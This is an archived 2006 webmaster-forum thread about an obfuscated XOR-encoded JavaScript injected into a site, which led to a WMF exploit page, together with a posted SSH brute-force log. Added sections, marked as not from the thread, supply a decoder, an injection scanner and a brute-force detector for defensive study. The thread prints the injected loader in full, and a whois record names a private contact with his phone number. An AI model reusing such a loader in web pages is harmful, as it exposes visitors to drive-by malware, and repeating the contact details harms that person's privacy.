GoFuckYourself.com - Adult Webmaster Forum

Thread: Weird JavaScript suddenly on page [pls help] (https://gfy.com/showthread.php?t=559591)

DutchTeenCash 01-03-2006 05:37 AM

Weird JavaScript suddenly on page [pls help]
 
uploaded a new index on dutchteenamateurs and suddenly this is on the site

<sc-ript language="JavaScript">
e = '0x00' + '5E';str1 = "%E5%BD%B6%AB%C1%AC%AD%A6%B5%BA%E2%FF%AB%B6%AC%B6% BF%B6%B5%B6%AD%A6%E7%B9%B6%BD%BD%BA%B3%FF%E3%E5%B6 %BB%AF%BE%B2%BA%C1%AC%AF%BC%E2%FF%B9%AD%AD%B1%E7%F 0%F0%AA%AC%BA%AF%AC%BC%B0%AA%B3%AD%BA%AF%F3%BC%B0% B2%F0%B3%AD%AF%BE%BB%F0%FF%C1%A8%B6%BD%AD%B9%E2%EE %C1%B9%BA%B6%B8%B9%AD%E2%EE%E3%E5%F0%B6%BB%AF%BE%B 2%BA%E3%E5%F0%BD%B6%AB%E3%C1%D2%D7";str=tmp='';for (i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCha rCode((tmp.charCodeAt(0)^e)-127);}document.write(str);
</sc-ript>

WTF is that? It asked for some counter to be installed; never added it. Gonna scan my PC right now :/
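Added example, not part of the original post: how the `e = '0x00' + '5E'` trick and the decode loop above actually work, written as a reusable decoder, plus a scanner for the pattern that can be run over other HTML files on the server. Function names are my own and the scanner's heuristics are an assumption, not a vendor signature.

```javascript
// Added example (not from the thread). Function names are my own.

// The injected script sets e = '0x00' + '5E'. That is the string '0x005E';
// the XOR operator coerces it to the number 0x5E = 94. Splitting the literal
// only serves to dodge naive string matching on "0x5E".
const XOR_KEY = Number('0x00' + '5E'); // 94

// Generalised form of the posted decode loop: every %XX token is XORed with
// the key and 127 is subtracted. Whitespace is dropped first, so a copy that
// was line-wrapped by a forum or mail client (like the one above) still decodes.
function decodePayload(encoded, key = XOR_KEY) {
  const tokens = encoded.replace(/\s+/g, '').match(/%[0-9A-Fa-f]{2}/g) || [];
  return tokens
    .map((tok) => String.fromCharCode((parseInt(tok.slice(1), 16) ^ key) - 127))
    .join('');
}

// Heuristic scanner for checking other HTML files: an inline script that
// unescapes a long %XX blob, rebuilds characters with String.fromCharCode and
// emits the result via document.write. Thresholds are an assumption.
function findInjectedScripts(html) {
  const hits = [];
  const scriptRe = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = scriptRe.exec(html)) !== null) {
    const body = m[1];
    const suspicious =
      /String\s*\.\s*fromCharCode/i.test(body) &&
      /\bunescape\s*\(/i.test(body) &&
      /document\s*\.\s*write\s*\(/i.test(body) &&
      /(%[0-9A-Fa-f]{2}\s*){8,}/.test(body);
    if (suspicious) hits.push({ offset: m.index, preview: body.slice(0, 60) });
  }
  return hits;
}
```

Fed the first twelve %XX tokens of the string posted above, decodePayload returns `<div style="`, i.e. the decoded text is HTML that document.write drops straight into the page.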

DutchTeenCash 01-03-2006 05:56 AM

boinkboink

Doc911 01-03-2006 06:11 AM

Haven't seen that one before, ThinkX. Looks similar to what Code Red was doing. Did a virus scan find anything?

Dennis69 01-03-2006 06:16 AM

I had someone install a counter like that across all my domains just before xmas... had to get my host to do a mass replace :321GFY

mortenb 01-03-2006 06:41 AM

Quote:

Originally Posted by Dennis69
I had someone install a counter like that across all my domains just before xmas... had to get my host to do a mass replace :321GFY

Yep. That was a fun night! :error :error :error

hjnet 01-03-2006 06:59 AM

Quote:

Originally Posted by Dennis69
I had someone install a counter like that across all my domains just before xmas... had to get my host to do a mass replace :321GFY

Do you have an idea who it was, or how he did it?

~Ray 01-03-2006 07:00 AM

Quote:

Originally Posted by hjnet
Do you have an idea who it was, or how he did it?

I'd like to know too... something new to bug my host about.

DutchTeenCash 01-03-2006 07:03 AM

Checking with BitDefender found 2 exploits on my C drive; I check every Monday so these are new since yesterday. Love to know what it is as well; they managed to get through BD and I'm only surfing in FF.

DutchTeenCash 01-03-2006 07:05 AM

it opened hxxp://userscounter.com/ntraf/animation.htm

DutchTeenCash 01-03-2006 07:07 AM

ok tried to open it with BD

c:\......\temp\eqe6x21s.wmf

Exploit.Win32.WMF-PFV

DutchTeenCash 01-03-2006 07:09 AM

Damn, Dec 28, that didn't take long :/

http://www.bitdefender.us/VIRUS-1736...2.WMF-PFV.html

Exploit.Win32.WMF-PFV
Virus Encyclopedia

Spreading: LOW Discovered : 2005 Dec 28
Damage: LOW
Size: 16 KB
FREE REMOVAL TOOL : N/A
SYMPTOMS:
Automatic worm or spyware installation, without confirmation.
TECHNICAL DESCRIPTION:
This is a WMF (Windows Meta-File) rendering exploit. The rendering bug that is exploited lies in the Windows Picture and Fax Viewer.

The WMF file could be placed on a web site that the victim visits and gets infected.

The exploit may create a shell on the victim computer, or may download and install a worm or a spyware trojan.

The exploit 'works' on Internet Explorer and some versions of Mozilla. However some browsers may display a confirmation dialog about it.

BitDefender detects this exploit as Exploit.Win32.WMF-PFV.
REMOVAL INSTRUCTIONS:
Please let BitDefender delete detected files.
ANALYZED BY:
BitDefender AntiVirus Lab

Thomas 01-03-2006 07:09 AM

Your server might be hacked, I've seen that before.
Check other HTML files to see if you find the same thing.

DutchTeenCash 01-03-2006 07:11 AM

k found it

I got it through the Chameleon window for TGP submission, that's IE; some TGP submit page must have it too. It pastes the exploit into HTML pages, so the server isn't hacked (checked IP too, it isn't).

DutchTeenCash 01-03-2006 07:12 AM

Quote:

Originally Posted by Thomas
Your server might be hacked, I've seen that before.
Check other HTML files to see if you find the same thing.

Thanks, glad it isn't.

Off topic: when are you gonna fix the Chameleon submission error stating 3-4 characters minimum at the gallery URL? Been like that for at least 2 months.

DutchTeenCash 01-03-2006 07:16 AM

feck

Jan 3 07:48:18 rhonda sshd[16932]: Failed password for invalid user test from 168.131.82.129 port 39491 ssh2
Jan 3 07:48:22 rhonda sshd[16957]: Invalid user test from 168.131.82.129
Jan 3 07:48:22 rhonda sshd[16957]: error: Could not get shadow information for NOUSER
Jan 3 07:48:22 rhonda sshd[16957]: Failed password for invalid user test from 168.131.82.129 port 39649 ssh2
Jan 3 07:48:25 rhonda sshd[16982]: Invalid user test from 168.131.82.129
Jan 3 07:48:25 rhonda sshd[16982]: error: Could not get shadow information for NOUSER
Jan 3 07:48:25 rhonda sshd[16982]: Failed password for invalid user test from 168.131.82.129 port 39760 ssh2
Jan 3 07:48:29 rhonda sshd[17004]: Invalid user test from 168.131.82.129
Jan 3 07:48:29 rhonda sshd[17004]: error: Could not get shadow information for NOUSER
Jan 3 07:48:29 rhonda sshd[17004]: Failed password for invalid user test from 168.131.82.129 port 39866 ssh2
Jan 3 07:48:33 rhonda sshd[17024]: Invalid user test from 168.131.82.129
Jan 3 07:48:33 rhonda sshd[17024]: error: Could not get shadow information for NOUSER
Jan 3 07:48:33 rhonda sshd[17024]: Failed password for invalid user test from 168.131.82.129 port 39971 ssh2
Jan 3 07:48:37 rhonda sshd[17038]: Invalid user test from 168.131.82.129
Jan 3 07:48:37 rhonda sshd[17038]: error: Could not get shadow information for NOUSER
Jan 3 07:48:37 rhonda sshd[17038]: Failed password for invalid user test from 168.131.82.129 port 40083 ssh2
Jan 3 07:48:41 rhonda sshd[17057]: Invalid user test from 168.131.82.129
Jan 3 07:48:41 rhonda sshd[17057]: error: Could not get shadow information for NOUSER
Jan 3 07:48:41 rhonda sshd[17057]: Failed password for invalid user test from 168.131.82.129 port 40184 ssh2
Jan 3 07:48:45 rhonda sshd[17076]: Invalid user test from 168.131.82.129
Jan 3 07:48:45 rhonda sshd[17076]: error: Could not get shadow information for NOUSER
Jan 3 07:48:45 rhonda sshd[17076]: Failed password for invalid user test from 168.131.82.129 port 40302 ssh2
Jan 3 07:48:49 rhonda sshd[17107]: Invalid user tester from 168.131.82.129
Jan 3 07:48:49 rhonda sshd[17107]: error: Could not get shadow information for NOUSER
Jan 3 07:48:49 rhonda sshd[17107]: Failed password for invalid user tester from 168.131.82.129 port 40449 ssh2
Jan 3 07:48:53 rhonda sshd[17124]: Invalid user tester from 168.131.82.129
Jan 3 07:48:53 rhonda sshd[17124]: error: Could not get shadow information for NOUSER
Jan 3 07:48:53 rhonda sshd[17124]: Failed password for invalid user tester from 168.131.82.129 port 40555 ssh2
Jan 3 07:48:56 rhonda sshd[17142]: Invalid user tester from 168.131.82.129
Jan 3 07:48:56 rhonda sshd[17142]: error: Could not get shadow information for NOUSER
Jan 3 07:48:56 rhonda sshd[17142]: Failed password for invalid user tester from 168.131.82.129 port 40663 ssh2
Jan 3 07:49:00 rhonda sshd[17159]: Invalid user tester from 168.131.82.129
Jan 3 07:49:00 rhonda sshd[17159]: error: Could not get shadow information for NOUSER
Jan 3 07:49:00 rhonda sshd[17159]: Failed password for invalid user tester from 168.131.82.129 port 40773 ssh2
Jan 3 07:49:04 rhonda sshd[17180]: Invalid user tester from 168.131.82.129
Jan 3 07:49:04 rhonda sshd[17180]: error: Could not get shadow information for NOUSER
Jan 3 07:49:04 rhonda sshd[17180]: Failed password for invalid user tester from 168.131.82.129 port 40873 ssh2
Jan 3 07:49:07 rhonda sshd[17245]: Invalid user tester from 168.131.82.129
Jan 3 07:49:07 rhonda sshd[17245]: error: Could not get shadow information for NOUSER
Jan 3 07:49:07 rhonda sshd[17245]: Failed password for invalid user tester from 168.131.82.129 port 40981 ssh2
Jan 3 07:49:11 rhonda sshd[17261]: Invalid user tester from 168.131.82.129
Jan 3 07:49:11 rhonda sshd[17261]: error: Could not get shadow information for NOUSER
Jan 3 07:49:11 rhonda sshd[17261]: Failed password for invalid user tester from 168.131.82.129 port 41086 ssh2
Jan 3 07:49:17 rhonda sshd[17292]: Invalid user tester from 168.131.82.129
Jan 3 07:49:17 rhonda sshd[17292]: error: Could not get shadow information for NOUSER
Jan 3 07:49:17 rhonda sshd[17292]: Failed password for invalid user tester from 168.131.82.129 port 41190 ssh2
Jan 3 07:49:21 rhonda sshd[17318]: Invalid user tester from 168.131.82.129
Jan 3 07:49:21 rhonda sshd[17318]: error: Could not get shadow information for NOUSER
Jan 3 07:49:21 rhonda sshd[17318]: Failed password for invalid user tester from 168.131.82.129 port 41376 ssh2

Location: Korea-KR [City: Seoul, Kyonggi-Do]

ARIN says that this IP belongs to APNIC; I'm looking it up there.

APNIC says that this IP belongs to KRNIC; I'm looking it up there.


한국인터넷진흥원(NIDA)의 인터넷정보센터(KRNIC)가 제공하는 Whois 서비스 입니다.

query: 168.131.82.129

# KOREAN

조회결과는 아래와 같으며, 실제 정보와 상이할 수 있습니다.

IPv4 주소 : 168.131.0.0-168.131.255.255
네트워크 이름 : CHONNAM-NET
할당내역 등록일 : 20040625
할당정보공개여부 : Y

[ IPv4 사용 기관 정보 ]
기관고유번호 : ORG384067
기관명 : 전남대학교
주소 : 광주 북구 용봉동
상세주소 : 300번지 전남대학교 정보전산원
우편 번호 : 500-757

[ 네트워크 담당자 인물 정보 ]
이름 : 조재민
기관명 : 전남대학교
주소 : 광주 북구 용봉동
상세주소 : 300번지 전남대학교 정보전산원
우편 번호 : 500-757
전화 번호 : +82-62-530-3684
전자 우편 : ****@chonnam.ac.kr
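Added example, not from the thread: detection logic for the sshd pattern in the log above (a run of `Failed password for invalid user ...` from one source inside a short window). The log lines are constructed in the same format with documentation IPs, and the threshold of 5 failures within 60 seconds is an assumption.

```javascript
// Added example (not from the thread). Flags hosts that hammer sshd with
// password guesses for non-existent accounts, like the log posted above.
// SAMPLE_LOG is constructed in the same format, using documentation IPs.
const SAMPLE_LOG = [
  'Jan 3 07:48:18 rhonda sshd[16932]: Failed password for invalid user test from 198.51.100.7 port 39491 ssh2',
  'Jan 3 07:48:22 rhonda sshd[16957]: Invalid user test from 198.51.100.7',
  'Jan 3 07:48:22 rhonda sshd[16957]: Failed password for invalid user test from 198.51.100.7 port 39649 ssh2',
  'Jan 3 07:48:25 rhonda sshd[16982]: Failed password for invalid user tester from 198.51.100.7 port 39760 ssh2',
  'Jan 3 07:48:29 rhonda sshd[17004]: Failed password for invalid user tester from 198.51.100.7 port 39866 ssh2',
  'Jan 3 07:48:33 rhonda sshd[17024]: Failed password for invalid user admin from 198.51.100.7 port 39971 ssh2',
  'Jan 3 07:50:01 rhonda sshd[17100]: Accepted publickey for deploy from 203.0.113.9 port 50000 ssh2',
  'Jan 3 07:51:10 rhonda sshd[17120]: Failed password for alice from 203.0.113.9 port 50010 ssh2',
].join('\n');

// "Failed password" lines only; "invalid user" means the account does not
// exist on the box (the NOUSER lines in the original log).
const FAILED_RE = /^\w{3}\s+\d+ (\d\d):(\d\d):(\d\d) \S+ sshd\[\d+\]: Failed password for (invalid user )?(\S+) from (\S+) port \d+ ssh2$/;

function parseFailedLogins(text) {
  const events = [];
  for (const line of text.split('\n')) {
    const m = FAILED_RE.exec(line);
    if (!m) continue;
    const secs = Number(m[1]) * 3600 + Number(m[2]) * 60 + Number(m[3]);
    events.push({ secs, invalidUser: Boolean(m[4]), user: m[5], ip: m[6] });
  }
  return events;
}

// Report source IPs with at least `threshold` failures inside any `windowSecs`
// span (window slides over the sorted timestamps), plus the usernames tried.
function findBruteForcers(text, threshold = 5, windowSecs = 60) {
  const byIp = new Map();
  for (const ev of parseFailedLogins(text)) {
    if (!byIp.has(ev.ip)) byIp.set(ev.ip, { times: [], invalid: 0, users: new Set() });
    const rec = byIp.get(ev.ip);
    rec.times.push(ev.secs);
    rec.invalid += ev.invalidUser ? 1 : 0;
    rec.users.add(ev.user);
  }
  const hits = [];
  for (const [ip, rec] of byIp) {
    const t = rec.times.slice().sort((a, b) => a - b);
    const burst = t.some((start, i) => i + threshold - 1 < t.length && t[i + threshold - 1] - start <= windowSecs);
    if (burst) hits.push({ ip, failures: t.length, invalidUser: rec.invalid, users: [...rec.users] });
  }
  return hits;
}
```

On the sample, only 198.51.100.7 is reported (5 failures in 15 seconds, all for non-existent accounts); the single failed login for a real user from 203.0.113.9 is left alone.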

Thomas 01-03-2006 07:19 AM

Quote:

Originally Posted by thinkx
Thanks, glad it isn't.

Off topic: when are you gonna fix the Chameleon submission error stating 3-4 characters minimum at the gallery URL? Been like that for at least 2 months.

Error? Could be a wrong setting by the webmaster. Hit me up on ICQ, I would like to see that.

spacedog 01-03-2006 07:19 AM

Quote:

Originally Posted by thinkx
it opened hxxp://userscounter.com/ntraf/animation.htm

That's the piece of shit counter that loaded on me when I went to visit amacontent site. I ICQ'd him to tell him about it. It downloads trojans onto users' PCs. Good thing I had Norton on. My IE6 got frozen, couldn't close windows & it used up resources like a motherfucker.

DutchTeenCash 01-03-2006 07:23 AM

Quote:

Originally Posted by spacedog
That's the piece of shit counter that loaded on me when I went to visit amacontent site. I ICQ'd him to tell him about it. It downloads trojans onto users' PCs. Good thing I had Norton on. My IE6 got frozen, couldn't close windows & it used up resources like a motherfucker.

Yeah, it's only in IE (I've got 5 though). It's gone now; update your AV 'cause mine didn't get it till today... It DLs a trojan, yes, an exploit that pastes the JS code.

sinnerscorner 01-03-2006 08:18 AM

More about this at: http://www.f-secure.com/weblog/

I am just wondering, are MGPs getting fewer clicks to their movie galleries now, as this seems to be a major exploit? And what are the MGP reviewers using to not get infected by this?

There is a temporary non-Micro$oft patch at http://www.hexblog.com/

DutchTeenCash 01-03-2006 08:29 AM

Thanks, yeah, lotsa ppl won't know till they find out weeks later, I think.

hjnet 01-03-2006 08:34 AM

DoubleBump

Very interesting thread, so everybody should read it to stop shit like this spreading any further!

dziggy 01-06-2006 08:25 AM

Quote:

Originally Posted by sinnerscorner
I am just wondering, are MGPs getting fewer clicks to their movie galleries now, as this seems to be a major exploit? And what are the MGP reviewers using to not get infected by this?

They should not use IE at least. Not now, not ever :thumbsup

There is a really good browser here I recommend: http://www.maxthon.com

sinnerscorner 01-06-2006 08:48 AM

I believe this exploit is browser independent. Anyway there is an official Micro$oft patch out as of today.

DutchTeenCash 01-06-2006 09:34 AM

Quote:

Originally Posted by sinnerscorner
I believe this exploit is browser independent. Anyway there is an official Micro$oft patch out as of today.

There is, I know, thanks :)
